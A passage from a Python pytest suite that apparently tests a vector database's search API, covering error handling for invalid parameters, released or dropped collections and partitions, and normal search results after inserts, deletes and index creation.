collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "should create connect first"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_no_collection(self):
"""
target: test the scenario which search the non-exist collection
method: 1. create collection
2. drop collection
3. search the dropped collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. Drop collection
collection_w.drop()
# 3. Search without collection
log.info("test_search_no_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s doesn't exist!" % collection_w.name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_missing(self):
"""
target: test search with incomplete parameters
method: search with incomplete parameters
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection with missing parameters
log.info("test_search_param_missing: Searching collection %s "
"with missing parameters" % collection_w.name)
try:
collection_w.search()
except TypeError as e:
assert "missing 4 required positional arguments: 'data', " \
"'anns_field', 'param', and 'limit'" in str(e)
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_vectors(self, get_invalid_vectors):
"""
target: test search with invalid parameter values
method: search with invalid data
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_vectors = get_invalid_vectors
log.info("test_search_param_invalid_vectors: searching with "
"invalid vectors: {}".format(invalid_vectors))
collection_w.search(invalid_vectors, default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`search_data` value {} is illegal".format(invalid_vectors)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_dim(self):
"""
target: test search with invalid parameter values
method: search with invalid dim
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search with invalid dim
log.info("test_search_param_invalid_dim: searching with invalid dim")
wrong_dim = 129
vectors = [[random.random() for _ in range(wrong_dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The dimension of query entities "
"is different from schema"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_type(self, get_invalid_fields_type):
"""
target: test search with invalid parameter type
method: search with invalid field type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_type
log.info("test_search_param_invalid_field_type: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`anns_field` value {} is illegal".format(invalid_search_field)})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_field_value(self, get_invalid_fields_value):
"""
target: test search with invalid parameter values
method: search with invalid field value
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_search_field = get_invalid_fields_value
log.info("test_search_param_invalid_field_value: searching with "
"invalid field: %s" % invalid_search_field)
collection_w.search(vectors[:default_nq], invalid_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Field %s doesn't exist in schema"
% invalid_search_field})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_metric_type(self, get_invalid_metric_type):
"""
target: test search with invalid parameter values
method: search with invalid metric type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. search with invalid metric_type
log.info("test_search_param_invalid_metric_type: searching with invalid metric_type")
invalid_metric = get_invalid_metric_type
search_params = {"metric_type": invalid_metric, "params": {"nprobe": 10}}
collection_w.search(vectors[:default_nq], default_search_field, search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "metric type not found"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_invalid_params_type(self, index, params):
"""
target: test search with invalid search params
method: test search with invalid params type
expected: raise exception and report the error
"""
if index == "FLAT":
pytest.skip("skip in FLAT index")
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
is_index=True)[0:4]
# 2. create index and load
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
collection_w.load()
# 3. search
invalid_search_params = cf.gen_invaild_search_params_type()
message = "Search params check failed"
for invalid_search_param in invalid_search_params:
if index == invalid_search_param["index_type"]:
search_params = {"metric_type": "L2", "params": invalid_search_param["search_params"]}
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 0,
"err_msg": message})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_limit_type(self, get_invalid_limit):
"""
target: test search with invalid limit type
method: search with invalid limit type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid field
invalid_limit = get_invalid_limit
log.info("test_search_param_invalid_limit_type: searching with "
"invalid limit: %s" % invalid_limit)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
invalid_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "`limit` value %s is illegal" % invalid_limit})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("limit", [0, 16385])
def test_search_param_invalid_limit_value(self, limit):
"""
target: test search with invalid limit value
method: search with invalid limit: 0 and maximum
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search with invalid limit (topK)
log.info("test_search_param_invalid_limit: searching with "
"invalid limit (topK) = %s" % limit)
err_msg = "limit %d is too large!" % limit
if limit == 0:
err_msg = "`limit` value 0 is illegal"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_type(self, get_invalid_expr_type):
"""
target: test search with invalid parameter type
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_type
log.info("test_search_param_invalid_expr_type: searching with "
"invalid expr: {}".format(invalid_search_expr))
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "The type of expr must be string ,"
"but {} is given".format(type(invalid_search_expr))})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_expr_value(self, get_invalid_expr_value):
"""
target: test search with invalid parameter values
method: search with invalid search expressions
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2 search with invalid expr
invalid_search_expr = get_invalid_expr_value
log.info("test_search_param_invalid_expr_value: searching with "
"invalid expr: %s" % invalid_search_expr)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, invalid_search_expr,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "invalid expression %s"
% invalid_search_expr})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_invalid_type(self, get_invalid_partition):
"""
target: test search invalid partition
method: search with invalid partition type
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search the invalid partition
partition_name = get_invalid_partition
err_msg = "`partition_name_array` value {} is illegal".format(partition_name)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, partition_name,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
@pytest.mark.tags(CaseLabel.L2)
def test_search_with_output_fields_invalid_type(self, get_invalid_output_fields):
"""
target: test search with output fields
method: search with invalid output_field
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix)[0]
# 2. search
log.info("test_search_with_output_fields_invalid_type: Searching collection %s" % collection_w.name)
output_fields = get_invalid_output_fields
err_msg = "`output_fields` value {} is illegal".format(output_fields)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: err_msg})
@pytest.mark.tags(CaseLabel.L1)
def test_search_release_collection(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release collection
3. search the released collection
expected: raise exception and report the error
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True, 10)[0]
# 2. release collection
collection_w.release()
# 3. Search the released collection
log.info("test_search_release_collection: Searching without collection ")
collection_w.search(vectors, default_search_field,
default_search_params, default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "collection %s was not loaded "
"into memory" % collection_w.name})
@pytest.mark.tags(CaseLabel.L2)
def test_search_release_partition(self):
"""
target: test the scenario which search the released collection
method: 1. create collection
2. release partition
3. search with specifying the released partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 10, partition_num)[0]
par = collection_w.partitions
par_name = par[partition_num].name
# 2. release partition
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par_name])
# 3. Search the released partition
log.info("test_search_release_partition: Searching specifying the released partition")
limit = 10
collection_w.search(vectors, default_search_field,
default_search_params, limit, default_search_exp,
[par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "partition has been released"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_collection(self):
"""
target: test search with empty connection
method: 1. search the empty collection before load
2. search the empty collection after load
3. search collection with data inserted but not load again
expected: 1. raise exception if not loaded
2. return topk=0 if loaded
3. return topk successfully
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix)[0]
# 2. search collection without data before load
log.info("test_search_with_empty_collection: Searching empty collection %s"
% collection_w.name)
err_msg = "collection" + collection_w.name + "was not loaded into memory"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, timeout=1,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": err_msg})
# 3. search collection without data after load
collection_w.load()
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": [],
"limit": 0})
# 4. search with data inserted but not load again
data = cf.gen_default_dataframe_data(nb=2000)
insert_res, _ = collection_w.insert(data)
sleep(1)
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_res.primary_keys,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_partition_deleted(self):
"""
target: test search deleted partition
method: 1. search the collection
2. delete a partition
3. search the deleted partition
expected: raise exception and report the error
"""
# 1. initialize with data
partition_num = 1
collection_w = self.init_collection_general(prefix, True, 1000, partition_num)[0]
# 2. delete partitions
log.info("test_search_partition_deleted: deleting a partition")
par = collection_w.partitions
deleted_par_name = par[partition_num].name
collection_w.drop_partition(deleted_par_name)
log.info("test_search_partition_deleted: deleted a partition")
collection_w.load()
# 3. search after delete partitions
log.info("test_search_partition_deleted: searching deleted partition")
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit, default_search_exp,
[deleted_par_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % deleted_par_name})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6731")
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_different_index_invalid_params(self, index, params):
"""
target: test search with different index
method: test search with different index
expected: searched successfully
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 5000,
partition_num=1,
is_index=True)[0:4]
# 2. create different index
if params.get("m"):
if (default_dim % params["m"]) != 0:
params["m"] = default_dim // 4
log.info("test_search_different_index_invalid_params: Creating index-%s" % index)
default_index = {"index_type": index, "params": params, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
log.info("test_search_different_index_invalid_params: Created index-%s" % index)
collection_w.load()
# 3. search
log.info("test_search_different_index_invalid_params: Searching after creating index-%s" % index)
collection_w.search(vectors, default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_search_index_partition_not_existed(self):
"""
target: test search not existed partition
method: search with not existed partition
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. create index
default_index = {"index_type": "IVF_FLAT", "params": {"nlist": 128}, "metric_type": "L2"}
collection_w.create_index("float_vector", default_index)
# 3. search the non exist partition
partition_name = "search_non_exist"
collection_w.search(vectors[:default_nq], default_search_field, default_search_params,
default_limit, default_search_exp, [partition_name],
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "PartitonName: %s not found" % partition_name})
@pytest.mark.tags(CaseLabel.L1)
def test_search_param_invalid_binary(self):
"""
target: test search within binary data (invalid parameter)
method: search with wrong metric type
expected: raise exception and report the error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. create index
default_index = {"index_type": "BIN_IVF_FLAT", "params": {"nlist": 128}, "metric_type": "JACCARD"}
collection_w.create_index("binary_vector", default_index)
# 3. search with exception
binary_vectors = cf.gen_binary_vectors(3000, default_dim)[1]
wrong_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector", wrong_search_params,
default_limit, default_search_exp,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "unsupported"})
@pytest.mark.tags(CaseLabel.L2)
def test_search_binary_flat_with_L2(self):
"""
target: search binary collection using FlAT with L2
method: search binary collection using FLAT with L2
expected: raise exception and report error
"""
# 1. initialize with binary data
collection_w = self.init_collection_general(prefix, True, is_binary=True)[0]
# 2. search and assert
query_raw_vector, binary_vectors = cf.gen_binary_vectors(2, default_dim)
search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
collection_w.search(binary_vectors[:default_nq], "binary_vector",
search_params, default_limit, "int64 >= 0",
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search failed"})
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_output_fields_not_exist(self):
"""
target: test search with output fields
method: search with non-exist output_field
expected: raise exception
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True)[0:4]
# 2. search
log.info("test_search_with_output_fields_not_exist: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=["int63"],
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: 'Field int63 not exist'})
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("output_fields", [[default_search_field], ["%"]])
def test_search_output_field_vector(self, output_fields):
"""
target: test search with vector as output field
method: search with one vector output_field or
wildcard for vector
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": "Search doesn't support "
"vector field as output_fields"})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("output_fields", [["*%"], ["**"], ["*", "@"]])
def test_search_output_field_invalid_wildcard(self, output_fields):
"""
target: test search with invalid output wildcard
method: search with invalid output_field wildcard
expected: raise exception and report the error
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, True)[0]
# 2. search
log.info("test_search_output_field_vector: Searching collection %s" % collection_w.name)
collection_w.search(vectors[:default_nq], default_search_field,
default_search_params, default_limit,
default_search_exp, output_fields=output_fields,
check_task=CheckTasks.err_res,
check_items={"err_code": 1,
"err_msg": f"Field {output_fields[-1]} not exist"})
class TestCollectionSearch(TestcaseBase):
""" Test case of search interface """
@pytest.fixture(scope="function",
params=[default_nb, default_nb_medium])
def nb(self, request):
yield request.param
@pytest.fixture(scope="function", params=[2, 500])
def nq(self, request):
yield request.param
@pytest.fixture(scope="function", params=[8, 128])
def dim(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def auto_id(self, request):
yield request.param
@pytest.fixture(scope="function", params=[False, True])
def _async(self, request):
yield request.param
"""
******************************************************************
# The following are valid base cases
******************************************************************
"""
@pytest.mark.tags(CaseLabel.L0)
def test_search_normal(self, nq, dim, auto_id):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: 1. search returned with 0 before travel timestamp
2. search successfully with limit(topK) after travel timestamp
"""
# 1. initialize with data
collection_w, _, _, insert_ids, time_stamp = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:5]
# 2. search before insert time_stamp
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp-1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0})
# 3. search after insert time_stamp
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
@pytest.mark.tag(CaseLabel.L0)
def test_search_with_hit_vectors(self, nq, dim, auto_id):
"""
target: test search with vectors in collections
method: create connections,collection insert and search vectors in collections
expected: search successfully with limit(topK) and can be hit at top 1 (min distance is 0)
"""
collection_w, _vectors, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# get vectors that inserted into collection
vectors = np.array(_vectors[0]).tolist()
vectors = [vectors[i][-1] for i in range(nq)]
log.info("test_search_with_hit_vectors: searching collection %s" % collection_w.name)
search_res, _ = collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit})
log.info("test_search_with_hit_vectors: checking the distance of top 1")
for hits in search_res:
# verify that top 1 hit is itself,so min distance is 0
assert hits.distances[0] == 0.0
@pytest.mark.tags(CaseLabel.L1)
def test_search_with_empty_vectors(self, dim, auto_id, _async):
"""
target: test search with empty query vector
method: search using empty query vector
expected: search successfully with 0 results
"""
# 1. initialize without data
collection_w = self.init_collection_general(prefix, True,
auto_id=auto_id, dim=dim)[0]
# 2. search collection without data
log.info("test_search_with_empty_vectors: Searching collection %s "
"using empty vector" % collection_w.name)
collection_w.search([], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("search_params", [{}, {"params": {}}, {"params": {"nprobe": 10}}])
def test_search_normal_default_params(self, dim, auto_id, search_params, _async):
"""
target: test search normal case
method: create connection, collection, insert and search
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = \
self.init_collection_general(prefix, True, auto_id=auto_id, dim=dim)[0:4]
# 2. search
log.info("test_search_normal: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(dim)] for _ in range(default_nq)]
collection_w.search(vectors[:default_nq], default_search_field,
search_params, default_limit,
default_search_exp, _async=_async,
travel_timestamp=0,
check_task=CheckTasks.check_search_results,
check_items={"nq": default_nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L1)
def test_search_before_after_delete(self, nq, dim, auto_id, _async):
"""
target: test search function before and after deletion
method: 1. search the collection
2. delete a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_before_after_delete: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. delete partitions
log.info("test_search_before_after_delete: deleting a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
collection_w.drop_partition(par[partition_num].name)
log.info("test_search_before_after_delete: deleted a partition")
collection_w.load()
# 4. search non-deleted part after delete partitions
log.info("test_search_before_after_delete: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_one(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release a partition
3. search the collection
expected: the deleted entities should not be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
partition_num = 1
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
partition_num,
auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_one: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release one partition
log.info("test_search_partition_after_release_one: releasing a partition")
par = collection_w.partitions
deleted_entity_num = par[partition_num].num_entities
entity_num = nb - deleted_entity_num
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[partition_num].name])
log.info("test_search_partition_after_release_one: released a partition")
# 4. search collection after release one partition
log.info("test_search_partition_after_release_one: searching after deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[:entity_num],
"limit": limit - deleted_entity_num,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_partition_after_release_all(self, nq, dim, auto_id, _async):
"""
target: test search function before and after release
method: 1. search the collection
2. release all partitions
3. search the collection
expected: 0 entity should be searched
"""
# 1. initialize with data
nb = 1000
limit = 1000
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:4]
# 2. search all the partitions before partition deletion
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_partition_after_release_all: searching before deleting partitions")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 3. release all partitions
log.info("test_search_partition_after_release_all: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[0].name, par[1].name])
log.info("test_search_partition_after_release_all: released a partition")
# 4. search collection after release all partitions
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": [],
"limit": 0,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_collection_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release collection
3. load collection
4. search the pre-released collection
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_collection_after_release_load: releasing collection %s" % collection_w.name)
collection_w.release()
log.info("test_search_collection_after_release_load: released collection %s" % collection_w.name)
# 3. Search the pre-released collection after load
log.info("test_search_collection_after_release_load: loading collection %s" % collection_w.name)
collection_w.load()
log.info("test_search_collection_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
default_limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.xfail(reason="issue 6997")
def test_search_partition_after_release_load(self, nb, nq, dim, auto_id, _async):
"""
target: search the pre-released collection after load
method: 1. create collection
2. release a partition
3. load partition
4. search the pre-released partition
expected: search successfully
"""
# 1. initialize without data
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb,
1, auto_id=auto_id,
dim=dim)[0:5]
# 2. release collection
log.info("test_search_partition_after_release_load: releasing a partition")
par = collection_w.partitions
conn = self.connection_wrap.get_connection()[0]
conn.release_partitions(collection_w.name, [par[1].name])
log.info("test_search_partition_after_release_load: released a partition")
# 3. Search the collection after load
limit = 1000
collection_w.load()
log.info("test_search_partition_after_release_load: searching after load")
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": limit,
"_async": _async})
# 4. Search the pre-released partition after load
if limit > par[1].num_entities:
limit_check = par[1].num_entities
else:
limit_check = limit
collection_w.search(vectors[:nq], default_search_field, default_search_params,
limit, default_search_exp,
[par[1].name], _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids[par[0].num_entities:],
"limit": limit_check,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_load_flush_load(self, nb, nq, dim, auto_id, _async):
"""
target: test search when load before flush
method: 1. search the collection
2. insert data and load
3. flush, and load
expected: search success with limit(topK)
"""
# 1. initialize with data
collection_w = self.init_collection_general(prefix, auto_id=auto_id, dim=dim)[0]
# 2. insert data
insert_ids = cf.insert_data(collection_w, nb, auto_id=auto_id, dim=dim)[3]
# 3. load data
collection_w.load()
# 4. flush and load
collection_w.num_entities
collection_w.load()
# 5. search for new data without load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, default_limit,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": default_limit,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_new_data(self, nq, dim, auto_id, _async):
"""
target: test search new inserted data without load
method: 1. search the collection
2. insert new data
3. search the collection without load again
expected: new data should be searched
"""
# 1. initialize with data
limit = 1000
nb_old = 500
collection_w, _, _, insert_ids, time_stamp = self.init_collection_general(prefix, True, nb_old,
auto_id=auto_id,
dim=dim)[0:5]
# 2. search for original data after load
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
log.info("test_search_new_data: searching for original data after load")
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp+1,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old,
"_async": _async})
# 3. insert new data
nb_new = 300
_, _, _, insert_ids_new, time_stamp = cf.insert_data(collection_w, nb_new,
auto_id=auto_id, dim=dim,
insert_offset=nb_old)
insert_ids.extend(insert_ids_new)
# gracefulTime is default as 1s which allows data
# could not be searched instantly in gracefulTime
time.sleep(gracefulTime)
# 4. search for new data without load
collection_w.search(vectors[:nq], default_search_field,
default_search_params, limit,
default_search_exp, _async=_async,
travel_timestamp=time_stamp,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nb_old + nb_new,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
def test_search_max_dim(self, auto_id, _async):
"""
target: test search with max configuration
method: create connection, collection, insert and search with max dim
expected: search successfully with limit(topK)
"""
# 1. initialize with data
collection_w, _, _, insert_ids = self.init_collection_general(prefix, True, 100,
auto_id=auto_id,
dim=max_dim)[0:4]
# 2. search
nq = 2
log.info("test_search_max_dim: searching collection %s" % collection_w.name)
vectors = [[random.random() for _ in range(max_dim)] for _ in range(nq)]
collection_w.search(vectors[:nq], default_search_field,
default_search_params, nq,
default_search_exp, _async=_async,
check_task=CheckTasks.check_search_results,
check_items={"nq": nq,
"ids": insert_ids,
"limit": nq,
"_async": _async})
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("index, params",
zip(ct.all_index_types[:9],
ct.default_index_params[:9]))
def test_search_after_different_index_with_params(self, dim, index, params, auto_id, _async):
"""
target: test search after different index
method: test search after different index and corresponding search params
expected: search successfully with limit(topK)
